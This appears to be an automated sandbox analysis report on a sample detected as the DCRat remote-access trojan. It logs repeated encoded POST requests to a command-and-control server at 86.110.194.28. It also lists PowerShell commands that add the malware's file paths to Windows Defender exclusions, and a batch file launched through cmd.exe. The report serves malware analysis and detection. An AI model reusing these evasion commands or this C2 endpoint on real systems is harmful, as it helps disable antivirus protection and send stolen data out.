                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:53.691917896 CET2576OUTData Raw: 5b 50 5e 51 58 5b 50 58 54 5b 59 5a 5b 5f 57 58 5f 50 5a 5a 52 55 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P^QX[PXT[YZ[_WX_PZZRUPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A)=!]#)8T%,+=+)07)'/ $#(,0*;' W?9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:54.039464951 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:54.169151068 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:53 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  110192.168.2.45011786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:54.286580086 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:54.645311117 CET2576OUTData Raw: 5e 51 5e 5e 58 5a 50 50 54 5b 59 5a 5b 53 57 5d 5f 50 5a 54 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^^XZPPT[YZ[SW]_PZTR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D?>"*$%,E*+04=X&6!45T!(0$:;3+)#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:54.996892929 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:55.130256891 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:54 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  111192.168.2.45011886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:55.256993055 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:55.613806009 CET2576OUTData Raw: 5e 51 5e 5f 5d 5b 55 58 54 5b 59 5a 5b 53 57 59 5f 53 5a 5a 52 51 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^_][UXT[YZ[SWY_SZZRQPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&C+X=[6*+%(D=*Z079[& 4=U4;7'@$,'+)#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:55.934767008 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:56.062140942 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:55 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  112192.168.2.45011986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:56.193258047 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:56.551321030 CET2576OUTData Raw: 5b 55 5b 5f 5d 5a 50 59 54 5b 59 5a 5b 50 57 5b 5f 5d 5a 5a 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [U[_]ZPYT[YZ[PW[_]ZZR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<.!5,$?/)^0'=Y2%6=V7(0 @$,#))#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:56.881352901 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:57.010067940 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:56 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  113192.168.2.45012086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:57.146694899 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:57.529161930 CET2576OUTData Raw: 5b 5d 5e 58 5d 59 50 5a 54 5b 59 5a 5b 5f 57 5d 5f 54 5a 54 52 5c 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^X]YPZT[YZ[_W]_TZTR\PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)=!]5\,R2<)8.^%4\%Y5P"7>7,%90S))#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:57.860397100 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:57.994900942 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:57 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  114192.168.2.45012186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:58.088395119 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  115192.168.2.45012286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:58.231065035 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:58.582638025 CET2568OUTData Raw: 5b 54 5b 5b 58 58 50 5d 54 5b 59 5a 5b 57 57 5d 5f 53 5a 54 52 57 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T[[XXP]T[YZ[WW]_SZTRWPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>""2$@=(!07)%""45W4+(X0?00?9#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:08:58.934947014 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:59.066900015 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:58 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  116192.168.2.45012386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:59.194683075 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2564
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:59.551453114 CET2564OUTData Raw: 5b 57 5e 5e 58 5f 50 50 54 5b 59 5a 5b 57 57 5b 5f 5c 5a 58 52 57 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^^X_PPT[YZ[WW[_\ZXRWPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B<*5:<V%<@="X3>1Y!R 4&7<%) A0<'(9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:59.902986050 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:09:00.034199953 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:59 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  117192.168.2.45012486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:09:00.163208961 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:09:00.860773087 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:09:10.868196011 CET166INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:09:00 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Jan 3, 2025 09:09:20.965403080 CET2576OUTData Raw: 5e 50 5b 5a 58 5a 50 5b 54 5b 59 5a 5b 50 57 5d 5f 51 5a 58 52 5c 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P[ZXZP[T[YZ[PW]_QZXR\PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<%!(U%Z?)(53$&/"6W48$Y'$@$/T<#Y'$X.


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:03:06:53
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\zZ1Y43bxxV.exe"
                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5 hash:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:7
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:9
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                                                                                                                                                                  Imagebase:0x7ff727490000
                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                  Has elevated privileges:true
